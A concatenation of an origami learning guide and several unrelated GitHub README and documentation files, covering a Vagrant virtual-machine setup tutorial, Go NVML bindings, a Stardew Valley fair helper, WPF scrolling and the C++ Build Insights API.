<strong>Expert Advice</strong>

What do the experts say about learning origami?

Dr. Robert J. Lang, one of the paper folders profiled in the PBS origami documentary <em>Between the Folds</em>, has had some 500 of his designs cataloged and diagrammed since he began practicing origami 40 years ago. He advises focusing on precision and control: don't worry about making a crease sharp until you know you are forming it in the right place, and only make a crease as sharp as the circumstances and context require.

Peter Engel, origami author and architect, believes patience is the most important trait for someone who wants to be successful at origami. "New folders have a tendency to jump into a complicated book and tackle the model that most appeals to them," he said. "If they get frustrated, they feel that they don't have the skill. But developing the capability to fold an intermediate or complex model takes lots of practice, and you shouldn't expect a perfect result the first time you fold anything. No one sits down at the piano for the first time and flawlessly executes Beethoven's <em>Appassionata Sonata</em>. When you start folding, try the equivalent of <em>Twinkle, Twinkle, Little Star</em> and work up slowly from there."

Benjamin John Coleman, known for his origami bonsai models, thinks beginning paper folders should know that even the experts they admire have devoted many hours to studying the craft. "It's hard to learn at first, especially folding new models. Some models take hundreds of hours and more than a month to master, but they're worth it," he said.
<strong>Supplies</strong>

Origami can be a frugal hobby, because in the beginning almost any paper will do for practice. If you don't want to purchase special origami paper, About Origami has free printable origami paper designs you can use. Otherwise, you can practice with newspaper, wrapping paper, or magazine pages.

<strong>Learn Origami Online</strong>

Although many people learn origami from a friend or family member who is proficient in the craft, you can teach yourself the art of paper folding even when no personal teacher is available. There are many excellent resources available for learning origami online.

A great resource for learning how to fold origami online is the OrigamiUSA website. OrigamiUSA is the American national society dedicated to origami. Their website has diagrams, tips, and general information for paper folders of all skill levels.

YouTube has many origami videos, although not all of them can be considered high-quality resources. Rob's World, I Love Origami, and EZ Origami are among the most popular channels for origami tutorials, but you can find gems from other producers as well.

If you have a Kindle Fire or an Android tablet, Amazon has several origami apps that you might find useful. Origami Tutorial is one of my personal favorites.

Social networking tools like Facebook and Pinterest are also good sources of origami inspiration, although instructions aren't always available for the particular project you like.

<strong>Origami Books</strong>

If you prefer a low-tech instructional method, About Origami has reviews of several origami books that you may find helpful.

<strong>Celebrate with an Origami Party</strong>

Once you have mastered the basics of origami, consider throwing an origami-themed party and teaching a few models to your family and friends. The experience of teaching others will give you greater confidence in your own abilities.
You may even inspire one of your pupils to begin their own origami journey! Check out About Origami's article How to Throw an Origami Party for party planning tips.
61220a14549fba306c4f9d2b00e25bac1debd4d9 | 2,839 | md | Markdown | README.md | bryan-munene/LMS-2-5-Create-a-Server | 3789a4ef636e74b948d819612f99fd0179e4343f | [
"MIT"
] | null | null | null | README.md | bryan-munene/LMS-2-5-Create-a-Server | 3789a4ef636e74b948d819612f99fd0179e4343f | [
"MIT"
] | null | null | null | README.md | bryan-munene/LMS-2-5-Create-a-Server | 3789a4ef636e74b948d819612f99fd0179e4343f | [
"MIT"
] | null | null | null | # LMS Output 2.5 Create a Server
## Description
Starting out by actually creating a server will give you insights into how servers work and help you be successful any time you’re working with a server in the future… which will be often!
This repo sets up and configires a virtual machine on the local machine, then installs an operating system on to the virtual machine. To set up this repo locally, a number of things are needed.
## Pre-requisite
1. A laptop or computer with at least 4gb of RAM
2. VirtualBox: Download and install virtual box from [here](https://www.virtualbox.org/wiki/Downloads). This is a virtual machine provider, just like VMWare and HyperV.
3. Vagrant: Download and install Vagrant from [here](https://www.vagrantup.com/downloads.html). Vagrant allows us to configure our virtual machine and save those configurations in a file.
## Steps To Set up.
If all the above pre-requisites are completed, then we can get on to setting up.
1. We need to clone this repo. Run this command on your terminal:
```
git clone https://github.com/bryan-munene/LMS-2-5-Create-a-Server.git
```
2. Move inside the newly created folder by running this command on your terminal:
```
cd LMS-2-5-Create-a-Server
```
3. Now, lets start up our virtual machine. This virtual machine is configured to run on `ubuntu/bionic64` OS.
To start our virtual machine, run this command on the terminal:
```
vagrant up
```
This installs all the dependencies and sets up the virtual machine as per the specifications in the `Vagrantfile` in the folder.
Once the command runs to completion, a log file of your virtual machine will be created in the same folder.
4. Your virtual machine is now configured, and it's up and running. Time to login to the newly created virtual machine. To log in, run this command on your terminal:
```
vagrant ssh
```
This logs you in to the virtual machine running on `ubuntu/bionic64` OS. The default root user is `vagrant`
From here you can run any command on the ubuntu vitual machine terminal.
5. To access the info about this virtual machine, you need to log out. Type this on the terminal to logout:
```
exit
```
To access the info mentioned above, type the following command in the terminal:
```
vagrant ssh-config
```
This command should give you an output that resembles this one below:
```
Host default
HostName 127.0.0.1
User vagrant
Port 2200
UserKnownHostsFile /dev/null
StrictHostKeyChecking no
PasswordAuthentication no
IdentityFile /~relative-path-to-your-file/LMS-2-5-Create-a-Server/.vagrant/machines/default/virtualbox/private_key
IdentitiesOnly yes
LogLevel FATAL
```
| 45.790323 | 205 | 0.712575 | eng_Latn | 0.994432 |
6122921074ad186789bcf82400d4c4ac389dcf83 | 959 | md | Markdown | vendor/github.com/karlmutch/go-nvml/README.md | karlmutch/studio-go-runner | b3072e3b9f0771a2caf017c02622709cce7338b0 | [
"Apache-2.0"
] | 1 | 2018-07-05T19:21:32.000Z | 2018-07-05T19:21:32.000Z | vendor/github.com/karlmutch/go-nvml/README.md | karlmutch/studio-go-runner | b3072e3b9f0771a2caf017c02622709cce7338b0 | [
"Apache-2.0"
] | 186 | 2018-12-19T02:17:19.000Z | 2021-09-23T01:08:42.000Z | vendor/github.com/karlmutch/go-nvml/README.md | karlmutch/studio-go-runner | b3072e3b9f0771a2caf017c02622709cce7338b0 | [
"Apache-2.0"
] | 10 | 2019-01-23T19:02:10.000Z | 2021-09-23T00:23:12.000Z | # NVML Bindings for Go [![API Documentation][godoc-svg]][godoc-url] [![MIT License][license-svg]][license-url]
## NOTE: This project was abandoned by the original author. The code was forked from https://github.com/davidr/go-nvml. I have begun adding minor functionality to it until such time as the official go bindings from Nvidia are better documented etc.
This package provides bindings to Nvidia's NVML library using the bridge functionality and CGO.
## Usage
### Basic
```go
package main
import nvml "github.com/karlmutch/go-nvml"
```
## License
All code in this repository is covered by the terms of the MIT License, the full
text of which can be found in the LICENSE file.
[godoc-url]: https://godoc.org/github.com/karlmutch/go-nvml
[godoc-svg]: https://godoc.org/github.com/karlmutch/go-nvml?status.svg
[license-url]: https://github.com/karlmutch/go-nvml/blob/master/LICENSE
[license-svg]: https://img.shields.io/badge/license-MIT-blue.svg
| 35.518519 | 248 | 0.757039 | eng_Latn | 0.934997 |
61241f1dde8904b17d9b19df8996f67d1cf8c188 | 1,309 | md | Markdown | README.md | MouseyPounds/stardew-fair-helper | 0ae6aa6f3248efc6aa43a4f5621f2c8ce40e3ce4 | [
"MIT"
] | 13 | 2019-06-20T22:30:15.000Z | 2022-02-26T07:25:20.000Z | README.md | MouseyPounds/stardew-fair-helper | 0ae6aa6f3248efc6aa43a4f5621f2c8ce40e3ce4 | [
"MIT"
] | null | null | null | README.md | MouseyPounds/stardew-fair-helper | 0ae6aa6f3248efc6aa43a4f5621f2c8ce40e3ce4 | [
"MIT"
] | 2 | 2021-06-20T14:14:39.000Z | 2021-12-02T08:06:41.000Z | # stardew-fair-helper
## About Stardew Fair Helper
This app helps to prepare for the Grange Display at the Fall Festival in [Stardew Valley](http://stardewvalley.net/). It will calculate the score for manually-entered items and also search through a save file to recommend which item combination would give the highest possible score. Please report any bugs, suggestions, or other feedback to [the topic in the Chucklefish forums](https://community.playstarbound.com/threads/webapp-stardew-fair-helper-make-the-best-grange-display.149849/).
The app is written in Javascript and uses [jQuery](https://jquery.com/) and [Select2](https://select2.org/); it is hosted on GitHub Pages at https://mouseypounds.github.io/stardew-fair-helper/ and the source code repository is https://github.com/MouseyPounds/stardew-fair-helper.
## Changelog
* 28 Dec 2020 - v3.0 - Support for Stardew Valley 1.5
* 24 Jul 2020 - v2.0.1 - Updated forum link in footer
* 26 Nov 2019 - v2.0 - Support for Stardew Valley 1.4
* 12 June 2019 - v1.1.2 - Fixed error with some item stacks being ignored
* 12 Feb 2019 - v1.1.1 - Fixed error parsing difficulty modifier
* 30 Jan 2019 - v1.1 - Improved support for iOS save files
* 15 Dec 2018 - v1.0.1 - Handling mod items a bit better
* 2 Nov 2018 - v1.0 - Initial release | 72.722222 | 489 | 0.749427 | eng_Latn | 0.943563 |
61249e1251386b2728f409474ea1935006995251 | 2,932 | md | Markdown | docs/framework/wpf/controls/how-to-scroll-content-by-using-the-iscrollinfo-interface.md | Graflinger/docs.de-de | 9dfa50229d23e2ee67ef4047b6841991f1e40ac4 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wpf/controls/how-to-scroll-content-by-using-the-iscrollinfo-interface.md | Graflinger/docs.de-de | 9dfa50229d23e2ee67ef4047b6841991f1e40ac4 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wpf/controls/how-to-scroll-content-by-using-the-iscrollinfo-interface.md | Graflinger/docs.de-de | 9dfa50229d23e2ee67ef4047b6841991f1e40ac4 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Vorgehensweise: Durchführen eines Bildlaufs von Inhalten mithilfe der IScrollInfo-Schnittstelle'
ms.date: 03/30/2017
dev_langs:
- csharp
- vb
helpviewer_keywords:
- ScrollViewer control [WPF], scrolling content
- scrolling content [WPF]
- IScrollInfo interface [WPF]
ms.assetid: d8700bef-a3f8-4c12-9de2-fc3b79f32cd3
ms.openlocfilehash: 6ebd8268e1358b45709885c07e6b096d5f806ebb
ms.sourcegitcommit: 5b6d778ebb269ee6684fb57ad69a8c28b06235b9
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 04/08/2019
ms.locfileid: "59098545"
---
# <a name="how-to-scroll-content-by-using-the-iscrollinfo-interface"></a>Vorgehensweise: Durchführen eines Bildlaufs von Inhalten mithilfe der IScrollInfo-Schnittstelle
Dieses Beispiel veranschaulicht das Scrollen von Inhalt mithilfe der <xref:System.Windows.Controls.Primitives.IScrollInfo> Schnittstelle.
## <a name="example"></a>Beispiel
Das folgende Beispiel veranschaulicht die Funktionen von der <xref:System.Windows.Controls.Primitives.IScrollInfo> Schnittstelle. Das Beispiel erstellt eine <xref:System.Windows.Controls.StackPanel> Element im [!INCLUDE[TLA#tla_xaml](../../../../includes/tlasharptla-xaml-md.md)] , die in ein übergeordnetes Element geschachtelt ist <xref:System.Windows.Controls.ScrollViewer>. Die untergeordneten Elemente des der <xref:System.Windows.Controls.StackPanel> Bildlauf möglich logisch mithilfe von definierten Methoden den <xref:System.Windows.Controls.Primitives.IScrollInfo> Schnittstelle und die Umwandlung in die Instanz von <xref:System.Windows.Controls.StackPanel> (`sp1`) im Code.
[!code-xaml[IScrollInfoMethods#2](~/samples/snippets/csharp/VS_Snippets_Wpf/IScrollInfoMethods/CSharp/Window1.xaml#2)]
Jede <xref:System.Windows.Controls.Button> in die [!INCLUDE[TLA2#tla_xaml](../../../../includes/tla2sharptla-xaml-md.md)] Datei löst eine zugeordnete benutzerdefinierte Methode, die in Scrollverhalten steuert <xref:System.Windows.Controls.StackPanel>. Das folgende Beispiel zeigt, wie Sie mit der <xref:System.Windows.Controls.Primitives.IScrollInfo.LineUp%2A> und <xref:System.Windows.Controls.Primitives.IScrollInfo.LineDown%2A> Methoden es zeigt auch generisch wie alle Methoden, die die Positionierung verwenden, die die <xref:System.Windows.Controls.Primitives.IScrollInfo> -Klasse definiert.
[!code-csharp[IScrollInfoMethods#3](~/samples/snippets/csharp/VS_Snippets_Wpf/IScrollInfoMethods/CSharp/Window1.xaml.cs#3)]
[!code-vb[IScrollInfoMethods#3](~/samples/snippets/visualbasic/VS_Snippets_Wpf/IScrollInfoMethods/VisualBasic/Window1.xaml.vb#3)]
## <a name="see-also"></a>Siehe auch
- <xref:System.Windows.Controls.ScrollViewer>
- <xref:System.Windows.Controls.Primitives.IScrollInfo>
- <xref:System.Windows.Controls.StackPanel>
- [Übersicht über ScrollViewer](scrollviewer-overview.md)
- [Gewusst wie-Themen](scrollviewer-how-to-topics.md)
- [Übersicht über Panel-Elemente](panels-overview.md)
| 73.3 | 687 | 0.804911 | deu_Latn | 0.678034 |
612503536286c976b9aab8b6cece135839eddd02 | 2,594 | md | Markdown | docs/build-insights/reference/sdk/functions/make-dynamic-analyzer-group.md | bobbrow/cpp-docs | 769b186399141c4ea93400863a7d8463987bf667 | [
"CC-BY-4.0",
"MIT"
] | 965 | 2017-06-25T23:57:11.000Z | 2022-03-31T14:17:32.000Z | docs/build-insights/reference/sdk/functions/make-dynamic-analyzer-group.md | bobbrow/cpp-docs | 769b186399141c4ea93400863a7d8463987bf667 | [
"CC-BY-4.0",
"MIT"
] | 3,272 | 2017-06-24T00:26:34.000Z | 2022-03-31T22:14:07.000Z | docs/build-insights/reference/sdk/functions/make-dynamic-analyzer-group.md | bobbrow/cpp-docs | 769b186399141c4ea93400863a7d8463987bf667 | [
"CC-BY-4.0",
"MIT"
] | 951 | 2017-06-25T12:36:14.000Z | 2022-03-26T22:49:06.000Z | ---
title: "MakeDynamicAnalyzerGroup"
description: "The C++ Build Insights SDK MakeDynamicAnalyzerGroup function reference."
ms.date: "02/12/2020"
helpviewer_keywords: ["C++ Build Insights", "C++ Build Insights SDK", "MakeDynamicAnalyzerGroup", "throughput analysis", "build time analysis", "vcperf.exe"]
---
# MakeDynamicAnalyzerGroup
::: moniker range="<=msvc-140"
The C++ Build Insights SDK is compatible with Visual Studio 2017 and above. To see the documentation for these versions, set the Visual Studio **Version** selector control for this article to Visual Studio 2017 or Visual Studio 2019. It's found at the top of the table of contents on this page.
::: moniker-end
::: moniker range=">=msvc-150"
The `MakeDynamicAnalyzerGroup` function is used to create a dynamic analyzer group. Members of an analyzer group receive events one by one from left to right, until all events in a trace get analyzed.
## Syntax
```cpp
auto MakeDynamicAnalyzerGroup(std::vector<IAnalyzer*> analyzers);
auto MakeDynamicAnalyzerGroup(std::vector<std::shared_ptr<IAnalyzer>> analyzers);
auto MakeDynamicAnalyzerGroup(std::vector<std::unique_ptr<IAnalyzer>> analyzers);
```
### Parameters
*analyzers*\
A vector of [IAnalyzer](../other-types/ianalyzer-class.md) pointers included in the dynamic analyzer group. These pointers can be raw, `std::unique_ptr`, or `std::shared_ptr`.
### Return Value
A dynamic analyzer group. Use the **`auto`** keyword to capture the return value.
## Remarks
Unlike static analyzer groups, the members of a dynamic analyzer group don't need to be known at compile time. You can choose analyzer group members at runtime based on program input, or based on other values that are unknown at compile time. Unlike static analyzer groups, [`IAnalyzer`](../other-types/ianalyzer-class.md) pointers within a dynamic analyzer group have polymorphic behavior, and virtual function calls are dispatched correctly. This flexibility comes at the cost of a possibly slower event processing time. When all analyzer group members are known at compile time, and if you don't need polymorphic behavior, consider using a static analyzer group. To use a static analyzer group, call [`MakeStaticAnalyzerGroup`](make-static-analyzer-group.md) instead.
A dynamic analyzer group can be encapsulated inside a static analyzer group. It's done by passing its address to [`MakeStaticAnalyzerGroup`](make-static-analyzer-group.md). Use this technique for passing dynamic analyzer groups to functions such as [`Analyze`](analyze.md), which only accept static analyzer groups.
::: moniker-end
| 58.954545 | 770 | 0.779877 | eng_Latn | 0.970311 |